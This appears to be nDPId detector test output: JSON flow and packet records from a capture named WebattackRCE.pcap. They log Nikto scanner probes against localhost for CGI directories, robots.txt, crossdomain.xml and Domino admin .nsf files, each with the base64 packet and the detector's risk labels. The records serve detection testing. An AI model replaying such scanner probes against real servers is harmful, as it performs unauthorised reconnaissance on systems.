+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} +01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} +01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 